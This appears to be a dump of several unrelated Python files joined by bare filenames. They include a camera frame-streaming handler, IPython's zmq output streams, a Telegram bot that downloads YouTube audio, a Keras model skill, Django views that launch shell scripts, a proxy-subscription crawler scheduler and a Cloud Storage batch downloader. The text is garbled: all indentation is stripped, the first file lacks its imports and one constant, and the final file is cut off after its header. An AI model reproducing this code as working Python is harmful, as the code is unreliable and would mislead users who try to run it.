# thread event timeout, The unit is second.
IMAGE_EVENT_TIMEOUT = 10
# heart beat timeout, The unit is second.
HEARTBEAT_TIMEOUT = 100
class ThreadEvent():
"""An Event-like class that signals all active clients when a new frame is
available.
"""
def __init__(self, timeout=None):
self.events = {}
self.timeout = timeout
def wait(self):
"""Invoked from each client's thread to wait for the next frame."""
ident = get_ident()
if ident not in self.events:
# this is a new client
# add an entry for it in the self.events dict
# each entry has two elements, a threading.Event() and a timestamp
self.events[ident] = [threading.Event(), time.time()]
return self.events[ident][0].wait(self.timeout)
def set(self):
"""Invoked by the camera thread when a new frame is available."""
now = time.time()
remove = None
for ident, event in self.events.items():
if not event[0].isSet():
# if this client's event is not set, then set it
# also update the last set timestamp to now
event[0].set()
event[1] = now
else:
# if the client's event is already set, it means the client
# did not process a previous frame
# if the event stays set for more than 5 seconds, then assume
# the client is gone and remove it
if now - event[1] > 5:
remove = ident
if remove:
del self.events[remove]
def clear(self):
"""Invoked from each client's thread after a frame was processed."""
self.events[get_ident()][0].clear()
class ChannelHandler():
"""A set of channel handlers, process data received from channel"""
def __init__(self, channel_name, media_type):
self.channel_name = channel_name
self.media_type = media_type
self.img_data = None
self._frame = None
self.thread = None
self._frame = None
# last time the channel receive data.
self.heartbeat = time.time()
self.web_event = ThreadEvent(timeout=WEB_EVENT_TIMEOUT)
self.image_event = ThreadEvent(timeout=IMAGE_EVENT_TIMEOUT)
self.lock = threading.Lock()
self.channel_manager = ChannelManager([])
self.rectangle_list = None
self.point_list = None
if media_type == "video":
self.thread_name = "videothread-{}".format(self.channel_name)
self.heartbeat = time.time()
self.close_thread_switch = False
self.fps = 0
self.image_number = 0
self.time_list = []
self._create_thread()
def close_thread(self):
"""close thread if object has created"""
if self.thread is None:
return
self.set_thread_switch()
self.image_event.set()
logging.info("%s set _close_thread_switch True", self.thread_name)
def set_heartbeat(self):
"""record heartbeat"""
self.heartbeat = time.time()
def set_thread_switch(self):
"""record heartbeat"""
self.close_thread_switch = True
def save_image(self, data, width, height, rectangle_list, point_list):
"""save image receive from socket"""
self.width = width
self.height = height
self.rectangle_list = rectangle_list
self.point_list = point_list
# compute fps if type is video
if self.media_type == "video":
while self.img_data:
time.sleep(0.01)
self.time_list.append(self.heartbeat)
self.image_number += 1
while self.time_list[0] + 1 < time.time():
self.time_list.pop(0)
self.image_number -= 1
if self.image_number == 0:
break
self.fps = len(self.time_list)
self.img_data = data
self.image_event.set()
else:
self.img_data = data
self.channel_manager.save_channel_image(self.channel_name,
self.img_data, self.rectangle_list, self.point_list)
self.heartbeat = time.time()
def get_media_type(self):
"""get media_type, support image or video"""
return self.media_type
def get_image(self):
"""get image_data"""
return self.img_data
def _create_thread(self):
"""Start the background video thread if it isn't running yet."""
if self.thread is not None and self.thread.isAlive():
return
# start background frame thread
self.thread = threading.Thread(target=self._video_thread)
self.thread.start()
def get_frame(self):
"""Return the current video frame."""
# wait util receive a frame data, and push it to your browser.
ret = self.web_event.wait()
self.web_event.clear()
# True: _web_event return because set()
# False: _web_event return because timeout
if ret:
return (self._frame, self.fps, self.width, self.height, self.rectangle_list, self.point_list)
return (None, None, None, None, None, None)
def frames(self):
"""a generator generates image"""
while True:
self.image_event.wait()
self.image_event.clear()
if self.img_data:
yield self.img_data
self.img_data = None
# if set _close_thread_switch, return immediately
if self.close_thread_switch:
yield None
# if no frames or heartbeat coming in the last 100 seconds,
# stop the thread and close socket
if time.time() - self.heartbeat > HEARTBEAT_TIMEOUT:
self.set_thread_switch()
self.img_data = None
yield None
def _video_thread(self):
"""background thread to process video"""
logging.info('create %s...', (self.thread_name))
for frame in self.frames():
if frame:
# send signal to clients
self._frame = frame
self.web_event.set()
# exit thread
if self.close_thread_switch:
self.channel_manager.clean_channel_resource_by_name(
self.channel_name)
logging.info('Stop thread:%s.', (self.thread_name))
break
|
iostream.py
|
# coding: utf-8
"""Wrappers for forwarding stdout/stderr over zmq"""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
from __future__ import print_function
import atexit
from binascii import b2a_hex
from collections import deque
try:
from importlib import lock_held as import_lock_held
except ImportError:
from imp import lock_held as import_lock_held
import os
import sys
import threading
import warnings
from io import StringIO, TextIOBase
import zmq
from zmq.eventloop.ioloop import IOLoop
from zmq.eventloop.zmqstream import ZMQStream
from jupyter_client.session import extract_header
from ipython_genutils import py3compat
from ipython_genutils.py3compat import unicode_type
#-----------------------------------------------------------------------------
# Globals
#-----------------------------------------------------------------------------
MASTER = 0
CHILD = 1
#-----------------------------------------------------------------------------
# IO classes
#-----------------------------------------------------------------------------
class IOPubThread(object):
"""An object for sending IOPub messages in a background thread
Prevents a blocking main thread from delaying output from threads.
IOPubThread(pub_socket).background_socket is a Socket-API-providing object
whose IO is always run in a thread.
"""
def __init__(self, socket, pipe=False):
"""Create IOPub thread
Parameters
----------
socket: zmq.PUB Socket
the socket on which messages will be sent.
pipe: bool
Whether this process should listen for IOPub messages
piped from subprocesses.
"""
self.socket = socket
self.background_socket = BackgroundSocket(self)
self._master_pid = os.getpid()
self._pipe_flag = pipe
self.io_loop = IOLoop(make_current=False)
if pipe:
self._setup_pipe_in()
self._local = threading.local()
self._events = deque()
self._setup_event_pipe()
self.thread = threading.Thread(target=self._thread_main)
self.thread.daemon = True
def _thread_main(self):
"""The inner loop that's actually run in a thread"""
self.io_loop.make_current()
self.io_loop.start()
self.io_loop.close(all_fds=True)
def _setup_event_pipe(self):
"""Create the PULL socket listening for events that should fire in this thread."""
ctx = self.socket.context
pipe_in = ctx.socket(zmq.PULL)
pipe_in.linger = 0
_uuid = b2a_hex(os.urandom(16)).decode('ascii')
iface = self._event_interface = 'inproc://%s' % _uuid
pipe_in.bind(iface)
self._event_puller = ZMQStream(pipe_in, self.io_loop)
self._event_puller.on_recv(self._handle_event)
@property
def _event_pipe(self):
"""thread-local event pipe for signaling events that should be processed in the thread"""
try:
event_pipe = self._local.event_pipe
except AttributeError:
# new thread, new event pipe
ctx = self.socket.context
event_pipe = ctx.socket(zmq.PUSH)
event_pipe.linger = 0
event_pipe.connect(self._event_interface)
self._local.event_pipe = event_pipe
return event_pipe
def _handle_event(self, msg):
"""Handle an event on the event pipe
Content of the message is ignored.
Whenever *an* event arrives on the event stream,
*all* waiting events are processed in order.
"""
# freeze event count so new writes don't extend the queue
# while we are processing
n_events = len(self._events)
for i in range(n_events):
event_f = self._events.popleft()
event_f()
def _setup_pipe_in(self):
"""setup listening pipe for IOPub from forked subprocesses"""
ctx = self.socket.context
# use UUID to authenticate pipe messages
self._pipe_uuid = os.urandom(16)
pipe_in = ctx.socket(zmq.PULL)
pipe_in.linger = 0
try:
self._pipe_port = pipe_in.bind_to_random_port("tcp://127.0.0.1")
except zmq.ZMQError as e:
warnings.warn("Couldn't bind IOPub Pipe to 127.0.0.1: %s" % e +
"\nsubprocess output will be unavailable."
)
self._pipe_flag = False
pipe_in.close()
return
self._pipe_in = ZMQStream(pipe_in, self.io_loop)
self._pipe_in.on_recv(self._handle_pipe_msg)
def _handle_pipe_msg(self, msg):
"""handle a pipe message from a subprocess"""
if not self._pipe_flag or not self._is_master_process():
return
if msg[0] != self._pipe_uuid:
print("Bad pipe message: %s", msg, file=sys.__stderr__)
return
self.send_multipart(msg[1:])
def _setup_pipe_out(self):
# must be new context after fork
ctx = zmq.Context()
pipe_out = ctx.socket(zmq.PUSH)
pipe_out.linger = 3000 # 3s timeout for pipe_out sends before discarding the message
pipe_out.connect("tcp://127.0.0.1:%i" % self._pipe_port)
return ctx, pipe_out
def _is_master_process(self):
return os.getpid() == self._master_pid
def _check_mp_mode(self):
"""check for forks, and switch to zmq pipeline if necessary"""
if not self._pipe_flag or self._is_master_process():
return MASTER
else:
return CHILD
def start(self):
"""Start the IOPub thread"""
self.thread.start()
# make sure we don't prevent process exit
# I'm not sure why setting daemon=True above isn't enough, but it doesn't appear to be.
atexit.register(self.stop)
def stop(self):
"""Stop the IOPub thread"""
if not self.thread.is_alive():
return
self.io_loop.add_callback(self.io_loop.stop)
self.thread.join()
if hasattr(self._local, 'event_pipe'):
self._local.event_pipe.close()
def close(self):
if self.closed:
return
self.socket.close()
self.socket = None
@property
def closed(self):
return self.socket is None
def schedule(self, f):
"""Schedule a function to be called in our IO thread.
If the thread is not running, call immediately.
"""
if self.thread.is_alive():
self._events.append(f)
# wake event thread (message content is ignored)
self._event_pipe.send(b'')
else:
f()
def send_multipart(self, *args, **kwargs):
"""send_multipart schedules actual zmq send in my thread.
If my thread isn't running (e.g. forked process), send immediately.
"""
self.schedule(lambda : self._really_send(*args, **kwargs))
def _really_send(self, msg, *args, **kwargs):
"""The callback that actually sends messages"""
mp_mode = self._check_mp_mode()
if mp_mode != CHILD:
# we are master, do a regular send
self.socket.send_multipart(msg, *args, **kwargs)
else:
# we are a child, pipe to master
# new context/socket for every pipe-out
# since forks don't teardown politely, use ctx.term to ensure send has completed
ctx, pipe_out = self._setup_pipe_out()
pipe_out.send_multipart([self._pipe_uuid] + msg, *args, **kwargs)
pipe_out.close()
ctx.term()
class BackgroundSocket(object):
"""Wrapper around IOPub thread that provides zmq send[_multipart]"""
io_thread = None
def __init__(self, io_thread):
self.io_thread = io_thread
def __getattr__(self, attr):
"""Wrap socket attr access for backward-compatibility"""
if attr.startswith('__') and attr.endswith('__'):
# don't wrap magic methods
super(BackgroundSocket, self).__getattr__(attr)
if hasattr(self.io_thread.socket, attr):
warnings.warn("Accessing zmq Socket attribute %s on BackgroundSocket" % attr,
DeprecationWarning, stacklevel=2)
return getattr(self.io_thread.socket, attr)
super(BackgroundSocket, self).__getattr__(attr)
def __setattr__(self, attr, value):
if attr == 'io_thread' or (attr.startswith('__' and attr.endswith('__'))):
super(BackgroundSocket, self).__setattr__(attr, value)
else:
warnings.warn("Setting zmq Socket attribute %s on BackgroundSocket" % attr,
DeprecationWarning, stacklevel=2)
setattr(self.io_thread.socket, attr, value)
def send(self, msg, *args, **kwargs):
return self.send_multipart([msg], *args, **kwargs)
def send_multipart(self, *args, **kwargs):
"""Schedule send in IO thread"""
return self.io_thread.send_multipart(*args, **kwargs)
class OutStream(TextIOBase):
"""A file like object that publishes the stream to a 0MQ PUB socket.
Output is handed off to an IO Thread
"""
# timeout for flush to avoid infinite hang
# in case of misbehavior
flush_timeout = 10
# The time interval between automatic flushes, in seconds.
flush_interval = 0.2
topic = None
encoding = 'UTF-8'
def __init__(self, session, pub_thread, name, pipe=None, echo=None):
if pipe is not None:
warnings.warn("pipe argument to OutStream is deprecated and ignored",
DeprecationWarning)
# This is necessary for compatibility with Python built-in streams
self.session = session
if not isinstance(pub_thread, IOPubThread):
# Backward-compat: given socket, not thread. Wrap in a thread.
warnings.warn("OutStream should be created with IOPubThread, not %r" % pub_thread,
DeprecationWarning, stacklevel=2)
pub_thread = IOPubThread(pub_thread)
pub_thread.start()
self.pub_thread = pub_thread
self.name = name
self.topic = b'stream.' + py3compat.cast_bytes(name)
self.parent_header = {}
self._master_pid = os.getpid()
self._flush_pending = False
self._subprocess_flush_pending = False
self._io_loop = pub_thread.io_loop
self._new_buffer()
self.echo = None
if echo:
if hasattr(echo, 'read') and hasattr(echo, 'write'):
self.echo = echo
else:
raise ValueError("echo argument must be a file like object")
def _is_master_process(self):
return os.getpid() == self._master_pid
def set_parent(self, parent):
self.parent_header = extract_header(parent)
def close(self):
self.pub_thread = None
@property
def closed(self):
return self.pub_thread is None
def _schedule_flush(self):
"""schedule a flush in the IO thread
call this on write, to indicate that flush should be called soon.
"""
if self._flush_pending:
return
self._flush_pending = True
# add_timeout has to be handed to the io thread via event pipe
def _schedule_in_thread():
self._io_loop.call_later(self.flush_interval, self._flush)
self.pub_thread.schedule(_schedule_in_thread)
def flush(self):
"""trigger actual zmq send
send will happen in the background thread
"""
if self.pub_thread and self.pub_thread.thread is not None and self.pub_thread.thread.is_alive():
# request flush on the background thread
self.pub_thread.schedule(self._flush)
# wait for flush to actually get through, if we can.
# waiting across threads during import can cause deadlocks
# so only wait if import lock is not held
if not import_lock_held():
evt = threading.Event()
self.pub_thread.schedule(evt.set)
# and give a timeout to avoid
if not evt.wait(self.flush_timeout):
# write directly to __stderr__ instead of warning because
# if this is happening sys.stderr may be the problem.
print("IOStream.flush timed out", file=sys.__stderr__)
else:
self._flush()
def _flush(self):
"""This is where the actual send happens.
_flush should generally be called in the IO thread,
unless the thread has been destroyed (e.g. forked subprocess).
"""
self._flush_pending = False
self._subprocess_flush_pending = False
if self.echo is not None:
try:
self.echo.flush()
except OSError as e:
if self.echo is not sys.__stderr__:
print("Flush failed: {}".format(e),
file=sys.__stderr__)
data = self._flush_buffer()
if data:
# FIXME: this disables Session's fork-safe check,
# since pub_thread is itself fork-safe.
# There should be a better way to do this.
self.session.pid = os.getpid()
content = {u'name':self.name, u'text':data}
self.session.send(self.pub_thread, u'stream', content=content,
parent=self.parent_header, ident=self.topic)
def write(self, string):
if self.echo is not None:
try:
self.echo.write(string)
except OSError as e:
if self.echo is not sys.__stderr__:
print("Write failed: {}".format(e),
file=sys.__stderr__)
if self.pub_thread is None:
raise ValueError('I/O operation on closed file')
else:
# Make sure that we're handling unicode
if not isinstance(string, unicode_type):
string = string.decode(self.encoding, 'replace')
is_child = (not self._is_master_process())
# only touch the buffer in the IO thread to avoid races
self.pub_thread.schedule(lambda : self._buffer.write(string))
if is_child:
# mp.Pool cannot be trusted to flush promptly (or ever),
# and this helps.
if self._subprocess_flush_pending:
return
self._subprocess_flush_pending = True
# We can not rely on self._io_loop.call_later from a subprocess
self.pub_thread.schedule(self._flush)
else:
self._schedule_flush()
def writelines(self, sequence):
if self.pub_thread is None:
raise ValueError('I/O operation on closed file')
else:
for string in sequence:
self.write(string)
def writable(self):
return True
def _flush_buffer(self):
"""clear the current buffer and return the current buffer data.
This should only be called in the IO thread.
"""
data = u''
if self._buffer is not None:
buf = self._buffer
self._new_buffer()
data = buf.getvalue()
buf.close()
return data
def _new_buffer(self):
self._buffer = StringIO()
|
bot.py
|
import os
import youtube_dl
import telepotpro
from random import randint
from multiprocessing import Process
from youtubesearchpython import VideosSearch
from dotenv import load_dotenv
from os.path import join, dirname
dotenv_path = join(dirname(__file__), '.env')
load_dotenv(dotenv_path)
TOKEN = os.environ.get("TOKEN")
bot = telepotpro.Bot(TOKEN)
class Music:
def __init__(self, user_input, msg):
self.chat = Chat
self.user_input = user_input[6:]
def search_music(self, user_input):
return VideosSearch(user_input, limit = 1).result()
def get_link(self, result):
return result['result'][0]['link']
def get_title(self, result):
return result['result'][0]['title']
def get_duration(self, result):
result = result['result'][0]['duration'].split(':')
min_duration = int(result[0])
split_count = len(result)
return min_duration, split_count
def download_music(self, file_name, link):
ydl_opts = {
'outtmpl': './'+file_name,
'format': 'bestaudio/best',
'postprocessors': [{
'key': 'FFmpegExtractAudio',
'preferredcodec': 'mp3',
'preferredquality': '256',
}],
'prefer_ffmpeg': True
}
with youtube_dl.YoutubeDL(ydl_opts) as ydl:
info_dict = ydl.extract_info(link, download=True)
pass
class Chat:
def __init__(self, msg):
self.chat_id = msg['chat']['id']
self.user_input = msg['text']
self.user_input = self.user_input.replace('@TLMusicDownloader_bot', '')
self.user_name = msg['from']['first_name']
self.message_id = msg['message_id']
self.messages = {
'start':'🤖 Hello, '+ self.user_name +'!\n\n'
'📩 Send me:\n\n'
'"*/music* _song name_" or\n'
'"*/music* _musician name - song name_"\n\n'
'to order some music. 🎶\n\n'
'BOT BY @SAHEEDS_BOTS',
'spotify_input_error':"‼️ *Oops! The bot doesn't support Spotify links!*\n"
'Try: "*/music* _song name_"\n'
'or: "*/music* _musician name - song name_"',
'invalid_command':'‼️ *Oops! Invalid command!*\n'
'Try: "*/music* _song name_"\n'
'or: "*/music* _musician name - song name_"',
'too_long':'‼️ *Oops! Video too long to convert!*\n'
'Order something 30 minutes or less.'
}
self.check_input(self.user_input, msg)
pass
def send_message(self, content):
return bot.sendMessage(self.chat_id, content, reply_to_message_id=self.message_id, parse_mode='Markdown')
def delete_message(self, message):
chat_id = message['chat']['id']
message_id = message['message_id']
bot.deleteMessage((chat_id, message_id))
pass
def send_audio(self, file_name):
bot.sendAudio(self.chat_id,audio=open(file_name,'rb'), reply_to_message_id=self.message_id)
pass
def process_request(self, user_input):
result = Music.search_music(self, user_input[6:])
min_duration, split_count = Music.get_duration(self, result)
if int(min_duration) < 30 and split_count < 3:
file_name = Music.get_title(self, result) +' - @TLMusicDownloader_bot '+str(randint(0,999999))+'.mp3'
file_name = file_name.replace('"', '')
self.send_message(f"🎵 {Music.get_title(self, result)}\n🔗 {Music.get_link(self, result)}")
downloading_message = self.send_message('⬇️ Downloading... \n_(this may take a while.)_')
Music.download_music(self, file_name, Music.get_link(self, result))
try:
self.send_audio(file_name)
self.delete_message(downloading_message)
self.send_message('✅ Sucess!')
print ("\nSucess!\n")
except:
print("\nError")
os.remove(file_name)
pass
def check_input(self, user_input, msg):
if user_input.startswith('/start'):
self.send_message(self.messages['start'])
elif user_input.startswith('/music') and user_input[6:]!='':
if 'open.spotify.com' in user_input[6:]:
self.send_message(self.messages['spotify_input_error'])
else:
#Valid command
self.process_request(user_input)
else:
#Invalid command
self.send_message(self.messages['invalid_command'])
pass
def start_new_chat(msg):
Process(target=Chat, args=(msg,)).start()
bot.message_loop(start_new_chat, run_forever=True)
|
model.py
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains the strategy class."""
import logging
import threading
from pathlib import Path
from tensorflow import keras
from aea.skills.base import Model
DEFAULT_MODEL_CONFIG_PATH = str(Path("..", "..", "model.config").resolve())
logger = logging.getLogger("aea.gym_skill")
class MLModel(Model):
"""This class defines a machine learning model."""
def __init__(self, **kwargs):
"""Initialize the machine learning model."""
self._model_config_path = kwargs.pop(
"model_config_path", DEFAULT_MODEL_CONFIG_PATH
)
super().__init__(**kwargs)
# TODO this at the momment does not work - need to compile the model according to the network configuration
# A better alternative is to save/load in HDF5 format, but that might require some system level dependencies
# https://keras.io/getting-started/faq/#how-can-i-install-hdf5-or-h5py-to-save-my-models-in-keras
# self._model = keras.Model.from_config(json.load(open(self._model_config_path)))
self._model = keras.Sequential(
[
keras.layers.Flatten(input_shape=(28, 28)),
keras.layers.Dense(128, activation="relu"),
keras.layers.Dense(10, activation="softmax"),
]
)
self._model.compile(
optimizer="adam",
loss="sparse_categorical_crossentropy",
metrics=["accuracy"],
)
self._lock = threading.Lock()
def fit(self, *args, **kwargs):
"""Fit a model."""
with self._lock:
return self._model.fit(*args, **kwargs)
def predict(self, *args, **kwargs):
"""Predict."""
with self._lock:
return self._model.predict(*args, **kwargs)
def evaluate(self, *args, **kwargs):
"""Predict."""
with self._lock:
return self._model.evaluate(*args, **kwargs)
def save(self):
"""Save the model weights."""
# TODO to implement.
def _update(self, X, y, epochs):
"""Update the ML model."""
logger.info("Start training with {} rows".format(X.shape[0]))
self.fit(X, y, epochs=epochs)
loss, acc = self.evaluate(X, y, verbose=2)
logger.info("Loss: {}, Acc: {}".format(loss, acc))
def update(self, X, y, epochs):
"""Update the ML model."""
thread = threading.Thread(target=self.fit, args=[X, y, epochs])
thread.start()
|
views.py
|
import json
import os
import time
import subprocess
import threading
import requests
from connector_api.models import Connector, ConnectorApp
from django.conf import settings
from django.shortcuts import render, redirect
from django.http import JsonResponse
from connector_api.serializers import ConnectorSerializer
from django.forms.models import model_to_dict
def home(request):
connectors = Connector.objects.all()
connector_apps = ConnectorApp.objects.all()
return render(request, "connection.html", {'connectors':connectors, 'connector_apps': connector_apps})
def start_connector(request):
response = redirect('/')
data = {
'connector_type': 'consumer',
'paired_connector': request.POST['provider'],
'connector_app': request.POST['connector']
}
connector_app = ConnectorApp.objects.get(name=data['connector_app'])
if connector_app.name == 'gsheets':
script_path = 'scripts/video-lib-connector/run-consumer-gsheet.sh'
elif connector_app.name == 'display':
script_path = 'scripts/video-lib-connector/run-consumer-display.sh'
else:
script_path = 'scripts/video-lib-connector/run-consumer-display.sh'
create_connector = ConnectorSerializer(data=data, many=isinstance(data, list))
if create_connector.is_valid():
create_connector.save()
message = "Created connectors successfully."
else:
message = "Could not create connectors successfully."
errors = create_connector.errors
print(errors)
print(message)
run_script(script_path)
if connector_app.name == 'gsheets':
t = threading.Thread(target=configure_gsheets,args=(request.POST,), kwargs={})
t.setDaemon(True)
t.start()
return response
def run_script(script_path):
try:
pid = os.fork()
except Exception as e:
print(e)
if pid == 0:
#create connector
subprocess.call([script_path])
print(os.getpid())
os._exit(0)
def configure_gsheets(config):
form_data = {
'sheet_title': config['sheet_title'],
'email': config['email'],
}
retry_count = 0
max_retry_count = 10
while(True):
time.sleep(5)
try:
r = requests.post('http://localhost:3001/configure/', data=form_data)
if r.status_code == 200:
break
else:
retry_count = retry_count+1
if retry_count > max_retry_count:
break
except:
retry_count = retry_count+1
if retry_count > max_retry_count:
break
time.sleep(55)
print('Retrying...')
def check_connector_status(connectors):
connectors = Connector.objects.all()
con_to_return = []
for connector in connectors:
try:
r = requests.get('http://localhost:'+connector.connector_app.port)
if(r.status_code == 200):
connector.status = 'active'
else:
connector.status = 'inactive'
except:
connector.status = 'inactive'
connector.save()
con_to_return.append({
'id': connector.id,
'status': connector.status,
'connector_app': connector.connector_app.name
})
return JsonResponse(con_to_return, safe=False)
def con_status(request):
connectors = Connector.objects.all()
return render(request, "status.html", context={"connectors": connectors})
def stop_connector(request):
try:
connector = Connector.objects.filter(id=request.GET['id'])[0]
connector_app = connector.connector_app
if connector_app.name == 'gsheets':
script_path = 'scripts/video-lib-connector/stop-consumer-gsheet.sh'
elif connector_app.name == 'display':
script_path = 'scripts/video-lib-connector/stop-consumer-display.sh'
else:
script_path = 'scripts/video-lib-connector/stop-consumer-display.sh'
run_script(script_path)
connector.delete()
except Exception as e:
print(e)
return redirect('/')
def log(request):
provider_logs_top_100 = []
consumer_logs_top_100 = []
print(settings.BASE_DIR)
consumer_log_path = os.path.join(settings.FILES_DIR, "consumer/app.json")
provider_log_path = os.path.join(settings.FILES_DIR, "provider/app.json")
try:
with open(consumer_log_path, "r") as ofs:
consumer_logs_top_100 = ofs.readlines()
file_length = len(consumer_logs_top_100)
consumer_logs_top_100 = consumer_logs_top_100[file_length-100:]
except:
print("folder not creater for logs")
try:
with open(provider_log_path, "r") as ofs:
provider_logs_top_100 = ofs.readlines()
file_length = len(provider_logs_top_100)
provider_logs_top_100 = provider_logs_top_100[file_length-100:]
except:
print("folder not creater for logs")
return render(request, "logs.html", context={"provider_logs_top_100": provider_logs_top_100, "consumer_logs_top_100": consumer_logs_top_100})
|
deploy.py
|
__all__ = ['GeventSchedule']
import time
import threading
import schedule
from BusinessCentralLayer.middleware.redis_io import *
from BusinessCentralLayer.sentinel import noticer
from BusinessLogicLayer.cluster import __task__
from config import REDIS_SECRET_KEY, SINGLE_TASK_CAP, CRAWLER_SEQUENCE, ENABLE_COROUTINE, LAUNCH_INTERVAL, logger
class GeventSchedule(object):
def __init__(self, go: bool = ENABLE_COROUTINE, deploy_cluster=CRAWLER_SEQUENCE, cap=SINGLE_TASK_CAP,
crontab=LAUNCH_INTERVAL):
# 任务队列
self.deploy_cluster = deploy_cluster
# 协程加速
self.go = go
# 单机采集极限
self.cap = cap
# 任务间隔</min>
self.crontab = crontab
# 接入集群
self.rc = RedisClient()
self.rc_len = dict(zip(self.deploy_cluster, [1] * 3))
def push_task(self, task_name: str) -> bool:
"""
@param task_name:
@return:
"""
# 输入参数的数据类型错误
if not isinstance(task_name, str):
logger.error(f'The input type is wrong({task_name})')
return False
# 输入的参数不在模型的权限范围中
if task_name not in self.deploy_cluster:
logger.error(f'Spelling error in input({task_name}),Please choose from {self.deploy_cluster}')
return False
try:
# 判断缓冲队列是否已达单机采集极限
task_name = task_name.lower()
self.rc_len[f'{task_name}'] = self.rc.__len__(REDIS_SECRET_KEY.format(f'{task_name}'))
logger.info(f'[TEST] ||正在检查({task_name}) 任务队列...')
# 若已达或超过单机采集极限,则休眠任务
if self.rc_len[f"{task_name}"] >= self.cap:
logger.debug(f'[SLEEP] || 任务队列已满 ({task_name}) ({self.rc_len[f"{task_name}"]}/{self.cap})')
return True
finally:
# 无论队列是否已满,执行一次ddt
self.ddt(class_=task_name)
try:
# 执行采集任务,通过self.go决定是否启动协程加速
logger.info(f'[RUN] || ({task_name}) 采集任务启动')
__task__.loads_task(task_name, self.go)
# 判断任务是否完全失败,既单个类型链接的所有采集任务全部失败->Abnormal
if self.rc.__len__(REDIS_SECRET_KEY.format(f'{task_name}')) < self.rc_len[f'{task_name}']:
logger.error(f'[CRITICAL]Abnormal collection task({task_name})')
else:
return True
except Exception as e:
# 捕获未知错误
logger.error(f'[ERROR]{self.__class__.__name__}({task_name}) crawler engine panic {e}')
finally:
# 单个类型的链接采集结束
logger.success('[OVER] || 任务结束 {}({})'.format(self.__class__.__name__, task_name))
@logger.catch()
def run_check(self, class_: str) -> None:
"""
启动任务:以非部署模式,传递参数
@param class_:
--传入的应是 config 中 crawler seq中的参数,如`v2ray`/`ssr`/`trojan`
--确保操作的原子性,不要一次性传入多个参数,
--正确的做法是通过<协程引擎>的消息队列形式驱动多任务
--或使用for迭代work_seq顺序驱动多任务
@return:
"""
__task__.loads_task(class_, self.go, startup=False, loads_=True)
# self.push_task(class_)
def ddt(self, class_: str = None) -> None:
"""
@param class_: subscribe type `ssr` or `v2ray` or `trojan` ...
@return:
"""
if class_ is None:
for item in self.deploy_cluster:
threading.Thread(target=RedisDataDisasterTolerance().run, args=(item,)).start()
elif isinstance(class_, str) and class_ in self.deploy_cluster:
RedisDataDisasterTolerance().run(class_)
else:
logger.warning('{}.ddt() 输入参数错误,可能的原因为:类型错误/不在crawler_seq工作队列内'.format(self.__class__.__name__))
def run(self) -> None:
# logger.warning('This is a development server. Do not use it in a production deployment.')
try:
for task_name in self.deploy_cluster:
try:
schedule.every(self.crontab['action']).minutes.do(self.push_task, task_name=task_name)
schedule.every(self.crontab['refresh']).minutes.do(self.rc.refresh,
key_name=REDIS_SECRET_KEY.format(task_name))
logger.info(f"start {task_name}/crontab:{self.crontab['action']} minutes")
except schedule.IntervalError:
logger.error('interval set error')
self.crontab['action'] += 5
while True:
schedule.run_pending()
time.sleep(1)
except Exception as err:
logger.exception('Exception occurred ||{}'.format(err))
noticer.send_email(text_body='{}'.format(err), to='self')
except KeyboardInterrupt as err:
logger.stop('Forced stop ||{}'.format(err))
if __name__ == '__main__':
GeventSchedule().run()
|
download_batch_files.py
|
from logging import Logger
import threading
from config import BaseConfig
from google.cloud.storage import Client as GSClient, Blob
def download_batch_into_memory(batch, bucket, inclue_metadata=True, max_threads=BaseConfig.MAX_THREADS_TO_DOWNLOAD_FILES):
"""Given a batch of storage filenames, download them into memory.
Downloading the files in a batch is multithreaded.
:param batch: A list of gs:// filenames to download.
:type batch: list of str
:param bucket: The google api pucket.
:type bucket: google.cloud.storage.bucket.Bucket
:param inclue_metadata: True to inclue metadata
:type inclue_metadata: bool
:param max_threads: Number of threads to use for downloading batch. Don't increase this over 10.
:type max_threads: int
:return: Complete blob contents and metadata.
:rtype: dict
"""
def download_blob(blob_name, state):
"""Standalone function so that we can multithread this."""
blob = bucket.blob(blob_name=blob_name)
content = blob.download_as_bytes() # json.loads(blob.download_as_string())
state[blob_name] = content
batch_data = {bn: {} for bn in batch}
threads = []
active_thread_count = 0
for blobname in batch:
thread = threading.Thread(target=download_blob, kwargs={"blob_name": blobname, "state": batch_data})
threads.append(thread)
thread.start()
active_thread_count += 1
if active_thread_count == max_threads:
# finish up threads in batches of size max_threads. A better implementation would be a queue
# from which the threads can feed, but this is good enough if the blob size is roughtly the same.
for thread in threads:
thread.join()
threads = []
active_thread_count = 0
# wait for the last of the threads to be finished
for thread in threads:
thread.join()
return batch_data
def download_batch_into_files(batch, bucket, inclue_metadata=True,
folder_path=BaseConfig.BLOCK_DIR, max_threads=BaseConfig.MAX_THREADS_TO_DOWNLOAD_FILES):
"""Given a batch of storage filenames, download them into memory.
Downloading the files in a batch is multithreaded.
:param batch: A list of gs:// filenames to download.
:type batch: list of str
:param bucket: The google api pucket.
:type bucket: google.cloud.storage.bucket.Bucket
:param inclue_metadata: True to inclue metadata
:type inclue_metadata: bool
:param max_threads: Number of threads to use for downloading batch. Don't increase this over 10.
:type max_threads: int
:return: Complete blob contents and metadata.
:rtype: dict
"""
def download_blob_to_file(blob_name, state):
"""Standalone function so that we can multithread this."""
blob = bucket.blob(blob_name=blob_name)
if blob.exists() : #and blob.size>0 isinstance(blob, Blob)
destination_uri = '{}/{}'.format(folder_path, blob.name.split('/')[1])
blob.download_to_filename(destination_uri)
state[blob_name]=1
else:
Logger.warning('Block file not found: {0}'.format(blob_name))
batch_data = {bn: {} for bn in batch}
threads = []
active_thread_count = 0
for blobname in batch:
thread = threading.Thread(target=download_blob_to_file, kwargs={"blob_name": blobname, "state": batch_data})
threads.append(thread)
thread.start()
active_thread_count += 1
if active_thread_count == max_threads:
# finish up threads in batches of size max_threads. A better implementation would be a queue
# from which the threads can feed, but this is good enough if the blob size is roughtly the same.
for thread in threads:
thread.join()
threads = []
active_thread_count = 0
# wait for the last of the threads to be finished
for thread in threads:
thread.join()
return batch_data
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Voxels developers
